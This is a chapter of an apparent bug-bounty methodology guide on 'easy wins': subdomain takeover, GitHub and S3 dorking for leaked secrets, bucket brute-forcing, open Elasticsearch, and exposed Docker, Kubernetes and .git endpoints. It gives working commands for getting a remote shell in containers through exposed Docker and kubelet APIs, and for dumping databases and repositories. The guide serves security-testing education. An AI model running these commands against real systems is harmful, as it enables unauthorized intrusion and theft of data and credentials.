# Chapter 9: Exploitation Easy Wins

## <mark style="color:yellow;">Subdomain Takeover</mark>

Occurs when a domain is pointing to another domain (CNAME) that no longer exists.

Once you have a list of subdomains check for this vulnerability using a tool like [Subjack](https://github.com/haccer/subjack)

[Here you can find out how to take over a specific service](https://github.com/EdOverflow/can-i-take-over-xyz).

```bash
# Subjack subdomain takes over search
./subjack -w <Subdomain List> -o results.txt -ssl -c fingerprints.json

# if it looks like there is a possible subdomain takeover on a domain, dig it!
# DNS lookup
dig <Domain Here>
# If we notice the CNAME record is pointing to a domain, 
# try If we can register this domain then we can take over the domain
```

ex:&#x20;

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FoSULxKt1tDyHeZbnYZUu%2Fimage.png?alt=media&#x26;token=319bcca9-6ad5-4e91-8cd5-8c2c594bb871" alt=""><figcaption><p>Subjack subdomain take over search.</p></figcaption></figure>

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2FOGLSe1G9ZHoxMebB5Xg8%2Fimage.png?alt=media&#x26;token=b5aec5e9-53ee-4cbb-87dd-186b436c4189" alt=""><figcaption><p>DNS lookup</p></figcaption></figure>

<figure><img src="https://1674729424-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyzdFWSUijzVYOP1hAsit%2Fuploads%2Fp7hrrvbbWDgOHsBvRpgE%2Fimage.png?alt=media&#x26;token=6005a7f1-661c-4739-a074-684596f9e3fc" alt=""><figcaption><p>Traffic manager register domain</p></figcaption></figure>

## <mark style="color:yellow;">GitHub</mark>

Most companies have a GitHub page, if you find this page you can monitor all of their employees for sensitive exposures.

Use GitHub dorks and look for passwords, tokens, Api keys, usernames, hidden URLs, or anything else that provides value.

1. GitHub Dorks

We can use dorks to find sensitive files that developers might have accidentally uploaded.

[Here is a good list of Dorks.](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)

EX: GitHub dork to find exposed bash history files:

* filename:.bash\_history DOMAIN-NAME

2. Company GitHub

Once you find a company's page you want to get a list of people that are associated with the company by clicking on the “people” tab then manually go through each one and look for exposures.

## <mark style="color:yellow;">Misconfigured Cloud Storage Buckets</mark>

One of the most popular vulnerabilities is finding an exposed cloud storage bucket.

Depending on what's in the bucket you might have access to sensitive information.

#### AWS S3 Bucket

There are several techniques for enumerating these buckets through Google dorks, brute forcing, or looking at the source code of a page.

1. S3 Bucket Dorks

The only downside is spending a lot of time shifting through the results.

EX: S3 bucket Google dork

* site:.s3.amazonaws.com "Starbucks"

2. S3 Bucket Brute force

If you go to the vulnerable endpoint, you should be able to list all files in the bucket and look for sensitive files such as backup files, zip files, user data, and any other PII information.

S3 bucket brute force using the [s3brute](https://github.com/ghostlulzhacks/s3brute) tool.

```bash
# S3 bucket brute force
python amazon-s3-enum.py -w BucketNames.txt -d <Domain Here>

```

If you go to the vulnerable endpoint, you should be able to list all files in the bucket and make sure to verify that it belongs to the company.

#### Google Cloud Storage

Once you find a vulnerable endpoint visit it and search for sensitive files similar to the AWS process.

Use [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) to brute force these bucket names.

```bash
# Google bucket brute force tool
cd GCPBucketBrute
python3 gcpbucketbrute.py -k <Domain Here> -u
```

#### Digital Ocean Spaces

The same as S3 buckets.

Google Dork to find Digital Ocean spaces:

* site:digitaloceanspaces.com

Brute force to find Digital Ocean spaces using the [Spaces Finder](https://github.com/appsecco/spaces-finder) tool.

#### Azure Blob

If your target utilizes Microsoft Cloud a lot, then they are probably using Azure blob storage.

Like S3 buckets this is used to store files.

You won’t be able to brute force these URLs because you have to know the bucket name as well on the blob name but using Google Dorks works well.

## <mark style="color:yellow;">Elastic Search DB</mark>

With unauthenticated access to the web service, attackers can easily dump the entire database.

Elastic Search is just another database where you can store and query information.

* uses something called types, each type can have several rows which are called documents, these docs are basically a json blob that holds your data.
* we store our documents in something called an index
* EX: {"id":1, "name":"ghostlulz", "password":"SuperSecureP\@ssword"}

#### Unauthenticated Elasticsearch DB

Elastic search has an HTTP server running on port 9200 that can be used to query the database.

Shodan search for elastic search instances:

* port:"9200" elastic

Once you have identified that your target has port 9200 open you can easily check if it is an Elasticsearch database by hitting the root directory with a GET request.

Once you know an endpoint has an exposed Elastic Search db try to find all the indexes (Databases) that are available.

<table><thead><tr><th width="301.3333333333333">Endpoint querying</th><th>Usage</th></tr></thead><tbody><tr><td>“/_cat/indices?v”</td><td>list out all of the indexes</td></tr><tr><td>“/_stats/?pretty=1”</td><td>list out all of the indexes with other details about the service</td></tr><tr><td>“/_all/_search?q=email”</td><td>perform a full-text search on the database and query every index for the word “email”.</td></tr><tr><td>“/INDEX_NAME_HERE/_mapping?pretty=1”</td><td>list all of the columns by making a GET request</td></tr><tr><td>“/_all/_search?q=_exists:email&#x26;pretty=1”</td><td>query all values that contain a specific column</td></tr></tbody></table>

## <mark style="color:yellow;">Docker API</mark>&#x20;

software engineers use docker containers to deploy their code so, they might expose their docker API to the public then we can hijack their infrastructure to deploy their own containers or even gain root access to a container.

#### Exposed Docker API

Shodan search for docker API:

* product:docker

Make a GET request to the /version endpoint To confirm that a desired host is running Docker and it will print out a json blob.

Once you have confirmed that a docker API is exposed I will generally move to the CLI version of docker and can execute the following commands:

```bash
# Docker list containers in a remote host
docker -H <host>:<port> ps
# Docker executes a shell command
Docker -H <host>:<port> exec -it <container name> /bin/bash
```

## <mark style="color:yellow;">Kubernetes API</mark>

Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management.

#### Exposed Kubernetes API

Kubernetes exposes an unauthenticated REST API on port 10250, If developers aren’t careful this API can be exposed to the internet.

Shodan search for Kubernetes API:

* product:"Kubernetes"

Once a Kubernetes service is detected the first thing to do is to get a list of pods by sending a GET request to the /pods endpoint:&#x20;

* from the response, we get the namespace name, pod name, and container name.
* with this information, we can Initiate a WebSocket connection to Kubernetes API using the following get request and the response indicates if it was successful and a web socket connect was created:

```bash
curl –insecure -v -H “X-Stream-Protocol-Version: v2.channel.k8s.io” -H “XStream-Protocol-Version: channel.k8s.io” -H “Connection: upgrade” -H 
“Upgrade: SPDY/3.1” -X POST 
“https://<DOMAIN>:<PORT>/exec/<NAMESPACE>/<POD 
NAME>/<CONTAINER NAME>?command=<COMMAND TO 
EXECUTE>&input=1&output=1&tty=1”
```

To handle web socket connections, use the wscat tool:

```bash
# Installation
apt-get install node-ws
# Kubernetes remote shell creation to gain RCE on a remote container
wscat -c “https://<DOMAIN>:<PORT>/<Location Header Value>” –no-check
```

## <mark style="color:yellow;">.git / .svn</mark>

Git and Subversion are two of the most popular revision control systems and they contain a hidden file that can cause a lot of harm if uploaded to your website.

You should be searching for the “.git” and “.svn” folders during your hunt.

#### Git

Every time you create a file git will compress it and stores it in its own data structure having a unique name, and hash, and will be stored under the object directory. This means that you can fully recreate the source code and everything else in the repository.

Try to navigate to “<https://example.com/.git”> and you see if that endpoint is vulnerable.

[Gitdumper](https://github.com/arthaud/git-dumper.git) tool extracts .git source code and files:

```bash
# Download the GitDumper
git clone https://github.com/arthaud/git-dumper.git
# Navigate to the GitDumper directory
cd git-dumper
# Install GitDumper's dependencies
pip3 install -r requirements.txt
# use GitDumper
python3 git-dumper.py <target Git repository URL>
```

Next, manually review the source code and look for bugs, vulnerabilities, and exposed passwords.

#### Subversion

The same as Git.

Try to navigate to “<https://example.com/.svn”> and you see if that endpoint is vulnerable.

[Svn-Extractor](https://github.com/anantshri/svn-extractor.git) tool extracts .svn source code and files:

```bash
# Download the Svn-Extractor script
git clone https://github.com/anantshri/svn-extractor.git
# Navigate to the Svn-Extractor directory
cd svn-extractor
# use Svn-Extractor
svn-extractor.py --url <target SVN repository URL>
```

Like Git, manually review the source code and look for bugs, vulnerabilities, and exposed passwords.